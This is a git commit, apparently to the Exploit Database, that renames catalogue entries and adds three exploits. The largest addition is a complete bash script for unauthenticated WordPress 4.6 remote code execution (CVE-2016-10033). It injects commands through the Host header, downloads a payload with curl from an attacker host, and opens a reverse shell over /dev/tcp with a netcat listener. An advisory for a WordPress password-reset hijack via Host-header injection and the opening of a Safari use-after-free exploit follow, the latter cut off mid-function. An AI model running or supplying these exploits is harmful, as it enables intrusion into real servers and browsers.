DB: 2017-05-05

3 new exploits Internet Explorer 11 - CMarkup::DestroySplayTree Use-After-Free Microsoft Internet Explorer 11 - 'CMarkup::DestroySplayTree' Use-After-Free Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit WordPress 2.6.1 - SQL Column Truncation Admin Takeover Exploit WordPress Core & Plugins - Privileges Unchecked in admin.php / Multiple Information WordPress Core & MU & Plugins - Privileges Unchecked in 'admin.php' / Multiple Information Disclosures WordPress 2.8.1 - (url) Cross-Site Scripting WordPress 2.8.1 - 'url' Cross-Site Scripting WordPress 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution WordPress < 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 NS8.1) WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 / NS8.1) Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - wp-comments-post.php Remote File Inclusion Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - wp-feed.php Remote File Inclusion Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - wp-trackback.php Remote File Inclusion Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-comments-post.php' Remote File Inclusion Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-feed.php' Remote File Inclusion Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-trackback.php' Remote File Inclusion WordPress 2.x - PHP_Self Cross-Site Scripting WordPress < 2.1.2 - PHP_Self Cross-Site Scripting WordPress 4.7.0/4.7.1 Plugin Insert PHP - PHP Code Injection WordPress Plugin Insert PHP 3.3.1 - PHP Code Injection WordPress 4.6 - Unauthenticated Remote Code Execution WordPress < 4.7.4 - Unauthorized Password Reset
2017-05-05 05:01:18 +00:00 · 2017-05-05 05:01:18 +00:00 · 8f3ada9286
commit 8f3ada9286
parent b473ba51f3
6 changed files with 464 additions and 14 deletions
--- a/files.csv
+++ b/files.csv
@ -5482,7 +5482,7 @@ id,file,description,date,author,platform,type,port
 41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
 41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
 41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
-41957,platforms/windows/dos/41957.html,"Internet Explorer 11 - CMarkup::DestroySplayTree Use-After-Free",2017-05-03,"Marcin Ressel",windows,dos,0
+41957,platforms/windows/dos/41957.html,"Microsoft Internet Explorer 11 - 'CMarkup::DestroySplayTree' Use-After-Free",2017-05-03,"Marcin Ressel",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -15482,6 +15482,7 @@ id,file,description,date,author,platform,type,port
 41934,platforms/windows/remote/41934.rb,"Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)",2017-04-25,Metasploit,windows,remote,0
 41935,platforms/hardware/remote/41935.rb,"WePresent WiPG-1000 - Command Injection (Metasploit)",2017-04-25,Metasploit,hardware,remote,80
 41942,platforms/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,python,remote,22
+41964,platforms/macos/remote/41964.html,"Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo and niklasb",macos,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -19741,7 +19742,7 @@ id,file,description,date,author,platform,type,port
 6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - 'jid' Parameter SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps,0
 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0
-6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0
+6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - SQL Column Truncation Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0
 6422,platforms/php/webapps/6422.txt,"PHPVID 1.1 - Cross-Site Scripting / SQL Injection",2008-09-10,r45c4l,php,webapps,0
 6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - 'page' Parameter SQL Injection",2008-09-10,Cru3l.b0y,php,webapps,0
 6425,platforms/php/webapps/6425.txt,"PHPWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion",2008-09-11,"Khashayar Fereidani",php,webapps,0
@ -21599,7 +21600,7 @@ id,file,description,date,author,platform,type,port
 9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,php,webapps,0
 9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - 'login.php user' Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0
 9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution",2009-07-10,darkjoker,php,webapps,0
-9110,platforms/php/webapps/9110.txt,"WordPress Core & Plugins - Privileges Unchecked in admin.php / Multiple Information",2009-07-10,"Core Security",php,webapps,0
+9110,platforms/php/webapps/9110.txt,"WordPress Core & MU & Plugins - Privileges Unchecked in 'admin.php' / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0
 9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0
 9112,platforms/php/webapps/9112.txt,"Joomla! Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0
 9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps,0
@ -21664,7 +21665,7 @@ id,file,description,date,author,platform,type,port
 9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - 'index.php idAuthor' SQL Injection",2009-07-24,NoGe,php,webapps,0
 9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - Authentication Bypass",2009-07-24,SwEET-DeViL,php,webapps,0
 9249,platforms/php/webapps/9249.txt,"XOOPS Celepar Module Qas - (codigo) SQL Injection",2009-07-24,s4r4d0,php,webapps,0
-9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - (url) Cross-Site Scripting",2009-07-24,superfreakaz0rz,php,webapps,0
+9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - 'url' Cross-Site Scripting",2009-07-24,superfreakaz0rz,php,webapps,0
 9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,php,webapps,0
 9252,platforms/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection",2009-07-24,Coksnuss,php,webapps,0
 9254,platforms/php/webapps/9254.txt,"PHP Live! 3.2.2 - 'questid' Parameter SQL Injection (2)",2009-07-24,skys,php,webapps,0
@ -22023,7 +22024,7 @@ id,file,description,date,author,platform,type,port
 10082,platforms/php/webapps/10082.txt,"PBBoard 2.0.2 - Full Path Disclosure",2009-10-06,rUnViRuS,php,webapps,0
 10085,platforms/jsp/webapps/10085.txt,"toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities",2009-11-07,"Alberto Trivero",jsp,webapps,0
 10088,platforms/php/webapps/10088.txt,"WordPress 2.0 < 2.7.1 - 'admin.php' Module Configuration Security Bypass",2009-11-10,"Fernando Arnaboldi",php,webapps,0
-10089,platforms/php/webapps/10089.txt,"WordPress 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",php,webapps,0
+10089,platforms/php/webapps/10089.txt,"WordPress < 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",php,webapps,0
 10090,platforms/php/webapps/10090.txt,"WordPress MU 1.2.2 < 1.3.1 - 'wp-includes/wpmu-functions.php' Cross-Site Scripting",2009-11-10,"Juan Galiana Lara",php,webapps,0
 10094,platforms/jsp/webapps/10094.txt,"IBM Rational RequisitePro 7.10 / ReqWebHelp - Multiple Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0
 10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 - Authentication Bypass",2009-11-13,"Stuart Udall",php,webapps,0
@ -24653,7 +24654,7 @@ id,file,description,date,author,platform,type,port
 15853,platforms/php/webapps/15853.txt,"DGNews 2.1 - SQL Injection",2010-12-29,kalashnikov,php,webapps,0
 15856,platforms/php/webapps/15856.php,"TYPO3 - Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,php,webapps,0
 15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0
-15858,platforms/php/webapps/15858.txt,"WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 NS8.1)",2010-12-29,Saif,php,webapps,0
+15858,platforms/php/webapps/15858.txt,"WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 / NS8.1)",2010-12-29,Saif,php,webapps,0
 15863,platforms/php/webapps/15863.txt,"LightNEasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0
 15864,platforms/php/webapps/15864.txt,"Ignition 1.3 - 'page.php' Local File Inclusion",2010-12-30,cOndemned,php,webapps,0
 15865,platforms/php/webapps/15865.php,"Ignition 1.3 - Remote Code Execution",2010-12-30,cOndemned,php,webapps,0
@ -29948,9 +29949,9 @@ id,file,description,date,author,platform,type,port
 28291,platforms/php/webapps/28291.txt,"MyBulletinBoard (MyBB) 1.x - 'usercp.php' Directory Traversal",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0
 28292,platforms/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps,0
 28294,platforms/php/webapps/28294.txt,"PHP-Nuke - INP modules.php Cross-Site Scripting",2006-07-28,l2odon,php,webapps,0
-28295,platforms/php/webapps/28295.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - wp-comments-post.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0
-28296,platforms/php/webapps/28296.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - wp-feed.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0
-28297,platforms/php/webapps/28297.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - wp-trackback.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0
+28295,platforms/php/webapps/28295.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-comments-post.php' Remote File Inclusion",2006-07-28,Drago84,php,webapps,0
+28296,platforms/php/webapps/28296.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-feed.php' Remote File Inclusion",2006-07-28,Drago84,php,webapps,0
+28297,platforms/php/webapps/28297.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-trackback.php' Remote File Inclusion",2006-07-28,Drago84,php,webapps,0
 28302,platforms/php/webapps/28302.txt,"Joomla! Component Liga Manager Online 2.0 - Remote File Inclusion",2006-07-30,vitux.manis,php,webapps,0
 28303,platforms/php/webapps/28303.txt,"X-Scripts X-Protection 1.10 - Protect.php SQL Injection",2006-07-29,SirDarckCat,php,webapps,0
 28304,platforms/php/webapps/28304.txt,"X-Scripts X-Poll 1.10 - top.php SQL Injection",2006-07-29,SirDarckCat,php,webapps,0
@ -31022,7 +31023,7 @@ id,file,description,date,author,platform,type,port
 29748,platforms/php/webapps/29748.txt,"Holtstraeter Rot 13 - Enkrypt.php Directory Traversal",2007-03-16,"BorN To K!LL",php,webapps,0
 29750,platforms/php/webapps/29750.php,"phpStats 0.1.9 - Multiple SQL Injections",2007-03-16,rgod,php,webapps,0
 29751,platforms/php/webapps/29751.php,"phpStats 0.1.9 - PHP-Stats-options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0
-29754,platforms/php/webapps/29754.html,"WordPress 2.x - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0
+29754,platforms/php/webapps/29754.html,"WordPress < 2.1.2  - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0
 29755,platforms/php/webapps/29755.html,"Guesbara 1.2 - Administrator Password Change",2007-03-19,Kacper,php,webapps,0
 29756,platforms/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 - 'print.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
 29757,platforms/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 - 'forums.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
@ -37458,7 +37459,7 @@ id,file,description,date,author,platform,type,port
 41306,platforms/php/webapps/41306.txt,"Video Subscription - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
 41299,platforms/hardware/webapps/41299.html,"D-link DIR-600M - Cross-Site Request Forgery",2017-02-10,"Ajay S. Kulal",hardware,webapps,0
 41307,platforms/php/webapps/41307.txt,"HotelCMS with Booking Engine - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
-41308,platforms/php/webapps/41308.txt,"WordPress 4.7.0/4.7.1 Plugin Insert PHP - PHP Code Injection",2017-02-09,CrashBandicot,php,webapps,0
+41308,platforms/php/webapps/41308.txt,"WordPress Plugin Insert PHP 3.3.1 - PHP Code Injection",2017-02-09,CrashBandicot,php,webapps,0
 41309,platforms/windows/webapps/41309.html,"SonicDICOM PACS 2.3.2 - Cross-Site Scripting",2017-02-11,LiquidWorm,windows,webapps,0
 41310,platforms/windows/webapps/41310.html,"SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)",2017-02-11,LiquidWorm,windows,webapps,0
 41311,platforms/windows/webapps/41311.txt,"SonicDICOM PACS 2.3.2 - Privilege Escalation",2017-02-11,LiquidWorm,windows,webapps,0
@ -37810,3 +37811,5 @@ id,file,description,date,author,platform,type,port
 41958,platforms/java/webapps/41958.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure",2017-05-03,LiquidWorm,java,webapps,0
 41960,platforms/java/webapps/41960.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change",2017-05-03,LiquidWorm,java,webapps,0
 41961,platforms/windows/webapps/41961.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution",2017-05-03,LiquidWorm,windows,webapps,0
+41962,platforms/linux/webapps/41962.sh,"WordPress 4.6 - Unauthenticated Remote Code Execution",2017-05-03,"Dawid Golunski",linux,webapps,0
+41963,platforms/linux/webapps/41963.txt,"WordPress < 4.7.4 - Unauthorized Password Reset",2017-05-03,"Dawid Golunski",linux,webapps,0
--- a/platforms/linux/webapps/41962.sh
+++ b/platforms/linux/webapps/41962.sh
@ -0,0 +1,186 @@
+#!/bin/bash
+#
+#      __                     __   __  __           __
+#     / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
+#    / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
+#   / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  )
+#  /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/
+#            /____/
+#
+#
+# WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
+# CVE-2016-10033
+#
+# wordpress-rce-exploit.sh (ver. 1.0)
+#
+#
+# Discovered and coded by
+#
+# Dawid Golunski (@dawid_golunski)
+# https://legalhackers.com
+#
+# ExploitBox project:
+# https://ExploitBox.io
+#
+# Full advisory URL:
+# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
+#
+# Exploit src URL:
+# https://exploitbox.io/exploit/wordpress-rce-exploit.sh
+#
+#
+# Tested on WordPress 4.6:
+# https://github.com/WordPress/WordPress/archive/4.6.zip
+#
+# Usage:
+# ./wordpress-rce-exploit.sh target-wordpress-url
+#
+#
+# Disclaimer:
+# For testing purposes only
+#
+#
+# -----------------------------------------------------------------
+#
+# Interested in vulns/exploitation?
+#
+#
+#                        .;lc'
+#                    .,cdkkOOOko;.
+#                 .,lxxkkkkOOOO000Ol'
+#             .':oxxxxxkkkkOOOO0000KK0x:'
+#          .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
+#       ':oxxxxxxxxxxo;.       .:oOKKKXXXNNNNOl.
+#      '';ldxxxxxdc,.              ,oOXXXNNNXd;,.
+#     .ddc;,,:c;.         ,c:         .cxxc:;:ox:
+#     .dxxxxo,     .,   ,kMMM0:.  .,     .lxxxxx:
+#     .dxxxxxc     lW. oMMMMMMMK  d0     .xxxxxx:
+#     .dxxxxxc     .0k.,KWMMMWNo :X:     .xxxxxx:
+#     .dxxxxxc      .xN0xxxxxxxkXK,      .xxxxxx:
+#     .dxxxxxc    lddOMMMMWd0MMMMKddd.   .xxxxxx:
+#     .dxxxxxc      .cNMMMN.oMMMMx'      .xxxxxx:
+#     .dxxxxxc     lKo;dNMN.oMM0;:Ok.    'xxxxxx:
+#     .dxxxxxc    ;Mc   .lx.:o,    Kl    'xxxxxx:
+#     .dxxxxxdl;. .,               .. .;cdxxxxxx:
+#     .dxxxxxxxxxdc,.              'cdkkxxxxxxxx:
+#      .':oxxxxxxxxxdl;.       .;lxkkkkkxxxxdc,.
+#          .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
+#             .':oxxxxxxxxx.ckkkkkkkkxl,.
+#                 .,cdxxxxx.ckkkkkxc.
+#                    .':odx.ckxl,.
+#                        .,.'.
+#
+# https://ExploitBox.io
+#
+# https://twitter.com/Exploit_Box
+#
+# -----------------------------------------------------------------
+
+
+
+rev_host="192.168.57.1"
+
+function prep_host_header() {
+      cmd="$1"
+      rce_cmd="\${run{$cmd}}";
+
+      # replace / with ${substr{0}{1}{$spool_directory}}
+      #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
+      rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"
+
+      # replace ' ' (space) with
+      #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
+      rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
+      #return "target(any -froot@localhost -be $rce_cmd null)"
+      host_header="target(any -froot@localhost -be $rce_cmd null)"
+      return 0
+}
+
+
+#cat exploitbox.ans
+intro="
+DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
+bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
+G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
+G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
+IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
+IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
+X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
+b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
+NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
+TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
+QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
+NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
+G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
+eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
+WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
+TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
+ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
+MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
+G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
+WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
+NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
+MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
+X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
+bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
+intro2="
+ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
+fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
+MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
+ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
+aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
+fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
+ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
+bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
+ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
+ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
+bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
+cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
+echo "$intro"  | base64 -d
+echo "$intro2" | base64 -d
+
+if [ "$#" -ne 1 ]; then
+echo -e "Usage:\n$0 target-wordpress-url\n"
+exit 1
+fi
+target="$1"
+echo -ne "\e[91m[*]\033[0m"
+read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
+echo
+
+
+if [ "$choice" == "y" ]; then
+
+echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
+echo -e "\e[92m[+]\033[0m Connected to the target"
+
+# Serve payload/bash script on :80
+RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
+echo "$RCE_exec_cmd" > rce.txt
+python -mSimpleHTTPServer 80 2>/dev/null >&2 &
+hpid=$!
+
+# Save payload on the target in /tmp/rce
+cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
+prep_host_header "$cmd"
+curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
+echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
+
+# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
+cmd="/bin/bash /tmp/rce"
+prep_host_header "$cmd"
+curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
+echo -e "\n\e[92m[+]\033[0m Payload executed!"
+
+echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
+nc -vv -l 1337
+echo
+else
+echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
+exit 0
+
+fi
+
+
+echo "Exiting..."
+exit 0
--- a/platforms/linux/webapps/41963.txt
+++ b/platforms/linux/webapps/41963.txt
@ -0,0 +1,71 @@
+=============================================
+- Discovered by: Dawid Golunski
+- dawid[at]legalhackers.com
+- https://legalhackers.com
+
+- CVE-2017-8295
+- Release date: 03.05.2017
+- Revision 1.0
+- Severity: Medium/High
+=============================================
+
+Source: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
+
+If an attacker sends a request similar to the one below to a default Wordpress
+installation that is accessible by the IP address (IP-based vhost):
+
+-----[ HTTP Request ]----
+
+POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
+Host: injected-attackers-mxserver.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 56
+
+user_login=admin&redirect_to=&wp-submit=Get+New+Password
+
+------------------------
+
+
+Wordpress will trigger the password reset function for the admin user account.
+
+Because of the modified HOST header, the SERVER_NAME will be set to
+the hostname of attacker's choice.
+As a result, Wordpress will pass the following headers and email body to the
+/usr/bin/sendmail wrapper:
+
+
+------[ resulting e-mail ]-----
+
+Subject: [CompanyX WP] Password Reset
+Return-Path: <wordpress@attackers-mxserver.com>
+From: WordPress <wordpress@attackers-mxserver.com>
+Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
+X-Priority: 3
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Someone requested that the password be reset for the following account:
+
+http://companyX-wp/wp/wordpress/
+
+Username: admin
+
+If this was a mistake, just ignore this email and nothing will happen.
+
+To reset your password, visit the following address:
+
+<http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>
+
+-------------------------------
+
+
+As we can see, fields Return-Path, From, and Message-ID, all have the attacker's
+domain set.
+
+
+The verification of the headers can be performed by replacing /usr/sbin/sendmail with a 
+bash script of:
+
+#!/bin/bash
+cat > /tmp/outgoing-email
--- a/platforms/macos/remote/41964.html
+++ b/platforms/macos/remote/41964.html
@ -0,0 +1,190 @@
+<!--
+Sources: 
+https://phoenhex.re/2017-05-04/pwn2own17-cachedcall-uaf
+https://github.com/phoenhex/files/blob/master/exploits/cachedcall-uaf.html
+
+Overview
+The WebKit bug we used at Pwn2Own is CVE-2017-2491 / ZDI-17-231, a use-after-free of a JSString object in JavaScriptCore. By triggering it, we can obtain a dangling pointer to a JSString object in a JavaScript callback. At first, the specific scenario seems very hard to exploit, but we found a rather generic technique to still get a reliable read/write primitive out of it, although it requires a very large (~28 GiB) heap spray. This is possible even on a MacBook with 8 GB of RAM thanks to the page compression mechanism in macOS.
+
+-->
+
+<script>
+
+function make_compiled_function() {
+    function target(x) {
+        return x*5 + x - x*x;
+    }
+    // Call only once so that function gets compiled with low level interpreter
+    // but none of the optimizing JITs
+    target(0);
+    return target;
+}
+
+function pwn() {
+    var haxs = new Array(0x100);
+    for (var i = 0; i < 0x100; ++i)
+        haxs[i] = new Uint8Array(0x100);
+
